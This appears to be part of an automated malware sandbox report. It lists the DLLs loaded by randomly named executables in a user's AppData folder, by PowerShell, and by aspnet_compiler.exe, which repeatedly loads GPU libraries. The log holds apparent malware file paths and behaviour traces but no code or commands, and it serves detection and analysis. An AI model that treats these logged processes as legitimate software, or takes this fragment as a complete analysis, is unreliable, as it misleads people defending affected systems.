Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxx.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: nvapi64.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: atiadlxy.dll
